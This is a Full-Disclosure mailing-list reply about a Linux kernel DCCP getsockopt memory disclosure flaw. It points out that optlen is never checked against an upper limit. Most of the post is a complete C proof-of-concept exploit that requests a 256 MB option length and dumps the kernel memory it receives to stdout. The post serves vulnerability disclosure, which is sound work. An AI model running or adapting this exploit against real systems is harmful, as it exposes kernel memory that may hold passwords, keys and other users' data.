Re: Linux Kernel DCCP Memory Disclosure Vulnerability

[Robert Święcki <jagger () swiecki net>]

> ...
> if (get_user(len, optlen))
>   return -EFAULT;
> if (len < sizeof(int))
>    return -EINVAL;

Actually, `optlen' is not checked againist upper limit as well, so we
can simply use any large positive value for getsockopt()'s optlen and we
will be able  to use it on IA32 cpus as well, without playing with
signedness. I must be blind :).

POC:
#include <netinet/in.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <net/if.h>
#include <sys/mman.h>
#include <linux/net.h>

#define BUFSIZE 0x10000000

int main(int argc, char *argv[])
{
     void *mem = mmap(0, BUFSIZE, PROT_READ | PROT_WRITE,
                MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
     if (mem == (void*)-1) {
        printf("Alloc failed\n");
        return -1;
     }
     /* SOCK_DCCP, IPPROTO_DCCP */
     int s = socket(PF_INET, 6, 33);
     if (s == -1) {
        fprintf(stderr, "socket failure!\n");
        return 1;
     }
    /* SOL_DCCP, DCCP_SOCKOPT_SEND_CSCOV */
     int len = BUFSIZE;
     int x = getsockopt(s, 269, 11, mem, &len);

     if (x == -1)
        perror("SETSOCKOPT");
     else
        printf("SUCCESS\n");

     write(1, mem, BUFSIZE);

     return 0;
}



-- 
Robert Swiecki - http://www.swiecki.net
NEVER EVER mess with a PCB jumper you don't understand, even if it's
labelled "SEX AND FREE BEER"   (C)1992 Dave Haynie - Amiga developer

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/